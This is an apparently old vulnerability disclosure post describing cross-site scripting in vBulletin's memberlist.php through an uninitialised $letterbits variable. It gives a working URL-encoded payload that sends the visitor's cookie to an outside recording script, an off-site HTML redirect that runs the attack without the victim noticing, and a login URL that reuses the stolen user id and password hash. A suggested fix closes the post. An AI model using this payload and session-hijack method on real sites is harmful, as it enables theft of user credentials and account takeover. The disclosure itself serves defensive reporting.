vBulletin ALL versions Vendor status: notified 3/18/2; no response Within the first few lines of code in memberlist.php, the variable $letterbits is evaled. Because of the way PHP initializes variables, we can inject HTML, or JavaScript into the document. So by directing a user to, for example: http://www.vbulletin.com/forum/memberlist.php?letterbits=%3Cscript%3Elocatio n%3D%27http%3A%2F%2Fwww%2Eswgmotu%2Ecom%2Ftests%2Frecord%2Ephp%3Fcook%3D%27% 2Bescape%28document%2Ecookie%29%3C%2Fscript%3E(vbulletin.com has apparently patched their installation somehow), I can steal the users password hash and user id. Because of the way vB parses urls, the above will not function inside the forum, but if we put this in an off-site html file: <script> location = "http://www.vbulletin.com/forum/memberlist.php?letterbits=%3Cscript%3Elocati on%3D%27http%3A%2F%2Fwww%2Eswgmotu%2Ecom%2Ftests%2Frecord%2Ephp%3Fcook%3D%27 %2Bescape%28document%2Ecookie%29%3C%2Fscript%3E" </script> and then link to it instead, the exploit will work as intended...the user doesn't even have to be aware of what has transpired...the above link will proceed first to the memberlist w/cookie stealing code, and then to my <shameless plug>Star Wars Galaxies Player Association's homepage. http://www.swgmotu.com <http://www.swgmotu.com/> </shameless plug> With the recorded user id and password hash, we can access the site: http://www.vbulletin.com/forum/index.php?bbuserid=[user id]&bbpassword=[password hash] I have tried this successfully on five other users besides myself(all with consent). I believe the simplest fix would be to initialized letterbits($letterbits = "";) at the top of memberlist.php. ~Plato
